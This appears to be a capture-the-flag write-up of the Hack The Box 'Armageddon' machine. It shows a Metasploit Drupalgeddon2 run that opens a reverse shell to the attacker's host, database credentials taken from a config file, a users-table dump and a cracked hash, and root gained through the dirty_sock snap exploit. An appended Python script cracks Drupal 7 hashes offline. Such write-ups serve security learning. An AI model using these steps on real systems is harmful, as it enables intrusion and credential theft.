Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1) | php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2) | php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution) | php/webapps/35150.php
Drupal 7.12 - Multiple Vulnerabilities | php/webapps/18564.txt
Drupal 7.x Module Services - Remote Code Execution | php/webapps/41564.php
Drupal < 4.7.6 - Post Comments Remote Command Execution | php/webapps/3313.pl
Drupal < 5.1 - Post Comments Remote Command Execution | php/webapps/3312.pl
Drupal < 5.22/6.16 - Multiple Vulnerabilities | php/webapps/33706.txt
Drupal < 7.34 - Denial of Service | php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit) | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC) | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit) | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC) | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution | php/webapps/46459.py
Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure | php/webapps/44501.txt
Drupal Module Ajax Checklist 5.x-1.0 - Multiple SQL Injections | php/webapps/32415.txt
Drupal Module CAPTCHA - Security Bypass | php/webapps/35335.html
Drupal Module CKEditor 3.0 < 3.6.2 - Persistent EventHandler Cross-Site Scripting | php/webapps/18389.txt
Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Scripting | php/webapps/25493.txt
Drupal Module CODER 2.5 - Remote Command Execution (Metasploit) | php/webapps/40149.rb
Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution | php/remote/40144.php
Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripting | php/webapps/35397.txt
Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary File Upload | php/webapps/37453.php
Drupal Module Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam - Multiple Vulnerabilities | php/webapps/35072.txt
Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit) | php/remote/40130.rb
Drupal Module Sections - Cross-Site Scripting | php/webapps/10485.txt
Drupal Module Sections 5.x-1.2/6.x-1.2 - HTML Injection | php/webapps/33410.txt
------------------------------------------------------------------------------------------------------------ | --------------------------
Shellcodes: No Results
```

# Exploit

## metasploit drupalgeddon2

```
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit

[*] Started reverse TCP handler on 10.10.14.6:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
[*] Sending stage (39282 bytes) to 10.10.10.233
[*] Meterpreter session 1 opened (10.10.14.6:4444 -> 10.10.10.233:41324) at 2021-06-08 06:09:47 -0400

meterpreter > sysinfo
Computer     : armageddon.htb
OS           : Linux armageddon.htb 3.10.0-1160.6.1.el7.x86_64 #1 SMP Tue Nov 17 13:59:11 UTC 2020 x86_64
Meterpreter  : php/linux
```

We have a couple of directories in the /var/www/html directory. After traversing the files, I have discovered a config file, settings.php within the sites/default directory, which contains a password and a username. I have also uploaded some privesc tools such as unix-privesc-check and linenum via the meterpreter upload functionality.

```
ls
authorize.php  cron.php   INSTALL.mysql.txt  INSTALL.sqlite.txt  linenum.sh       modules   README.txt  sites               update.php   web.config
CHANGELOG.txt  includes   INSTALL.pgsql.txt  INSTALL.txt         MAINTAINERS.txt  out.txt   robots.txt  themes              UPGRADE.txt  xmlrpc.php
COPYRIGHT.txt  index.php  install.php        LICENSE.txt         misc             profiles  scripts     unix-privesc-check

cat usersdump.sql
<deleted>
$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupal',
      'username' => 'drupaluser',
      'password' => 'CQHEy@9M*m23gBVj',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
<deleted>
```

Next, I use the credentials to log in to the drupal DB and enumerate its tables. Following that, I dump the users table from the database 'drupal'. Finally, I analyse the dump file and discover credentials for *brucetherealadmin*.

```
mysql -u drupaluser -p -D drupal -e 'show tables;'
<deleted>
users
<deleted>

mysqldump -u drupaluser -p drupal users > usersdump.sql

cat usersdump.sql
<deleted>
(1,'brucetherealadmin','$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt','[email protected]','','','filtered_html',1606998756,1607077194,1607076276,1,'Europe/London','',0,'[email protected]','a:1:{s:7:\"overlay\";i:1;}'),
<deleted>
```

Cracking the hash with john was easy and straightforward.

```
john forjohn -w /usr/share/wordlists/rockyou.txt

$ cat /home/kali/.john/john.pot
$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt:booboo
```

Log in to the web application with the credentials. I remembered there is an SSH service running, so I tried logging into it.

```
# ssh brucetherealadmin@10.10.10.233
The authenticity of host '10.10.10.233 (10.10.10.233)' can't be established.
ECDSA key fingerprint is SHA256:bC1R/FE5sI72ndY92lFyZQt4g1VJoSNKOeAkuuRr4Ao.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.233' (ECDSA) to the list of known hosts.
brucetherealadmin@10.10.10.233's password:
Last login: Fri Mar 19 08:01:19 2021 from 10.10.14.5
[brucetherealadmin@armageddon ~]$
```

I have discovered that the binary *snap* does not require a password and is owned by root.

```
[brucetherealadmin@armageddon ~]$ sudo -l
Matching Defaults entries for brucetherealadmin on armageddon:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset,
    env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User brucetherealadmin may run the following commands on armageddon:
    (root) NOPASSWD: /usr/bin/snap install *
```

A little research on snap gives us GTFOBins solutions to the problem.

1. Tried https://gtfobins.github.io/gtfobins/snap/ but it did not work.
2. A bit of additional research reveals https://github.com/initstring/dirty_sock

I have followed the steps from '2' and it did not work. It seems the Python version is incorrect. So I copied the source code of the exploit and pasted it into a new file and ran it with the correct Python version. Finally, I was able to root the box by installing the snap exploit, which created a user called dirty_sock:dirty_sock, which provides us with root access.

The box is quite interesting and it's nice to learn something new such as the snap vulnerability and ways to exploit it. All in all, a pretty fun box.
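Added example (not code from the post, and not Drupal's own code): a Python port of the Drupal 7 password scheme that john cracked above, so the hash from usersdump.sql can be checked against candidate words offline. The scheme is `$S$`, one character giving log2 of the iteration count, an 8-character salt, then SHA-512 iterated 2**count times, encoded with phpass base64 and truncated to 55 characters. The candidate word list in the block is a constructed sample.

```python
"""Verify and dictionary-check Drupal 7 password hashes offline.

Added example, not code from the original post and not Drupal's own code.
It ports the Drupal 7 _password_crypt() scheme: '$S$' + log2(iterations)
+ 8-char salt, SHA-512 iterated 2**log2 times, phpass base64, cut to 55
characters. CANDIDATES is a constructed sample word list.
"""
import hashlib
import os

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
DRUPAL_HASH_LENGTH = 55
DRUPAL_HASH_COUNT = 15          # Drupal 7 default: 2**15 iterations

# brucetherealadmin's hash exactly as it appears in the post's usersdump.sql.
POST_HASH = "$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt"
CANDIDATES = ["password", "admin", "booboo"]   # constructed sample word list


def phpass_b64(data):
    """phpass-style base64 (Drupal's _password_base64_encode), bit-exact port."""
    out, i, n = [], 0, len(data)
    while True:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
        if i >= n:
            break
    return "".join(out)


def parse_setting(stored):
    """Return (count_log2, salt) from the 12-character setting prefix."""
    setting = stored[:12]
    if len(setting) != 12 or not setting.startswith("$S$"):
        raise ValueError("not a Drupal 7 SHA-512 hash")
    return ITOA64.index(setting[3]), setting[4:12]


def drupal7_hash(password, setting):
    """Drupal 7 _password_crypt('sha512', ...) truncated to DRUPAL_HASH_LENGTH."""
    count_log2, salt = parse_setting(setting)
    pw = password.encode()
    digest = hashlib.sha512(salt.encode() + pw).digest()
    for _ in range(1 << count_log2):            # do { ... } while (--count)
        digest = hashlib.sha512(digest + pw).digest()
    return (setting[:12] + phpass_b64(digest))[:DRUPAL_HASH_LENGTH]


def make_setting(count_log2=DRUPAL_HASH_COUNT):
    """Fresh '$S$' + count char + 8-char random salt, as Drupal does for new hashes."""
    return "$S$" + ITOA64[count_log2] + phpass_b64(os.urandom(6))[:8]


def verify(password, stored):
    """True if password hashes to the stored value (constant time not needed offline)."""
    return drupal7_hash(password, stored) == stored


def crack(stored, candidates):
    """Return the first candidate whose hash matches, or None."""
    for word in candidates:
        if verify(word, stored):
            return word
    return None


if __name__ == "__main__":
    print("count_log2, salt:", parse_setting(POST_HASH))
    print("match:", crack(POST_HASH, CANDIDATES))
```

Each guess costs 2**15 SHA-512 calls, so a full rockyou run in pure Python is slow; the point of the block is to see exactly what john is computing, and to check a single stolen hash without shipping it to another tool.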
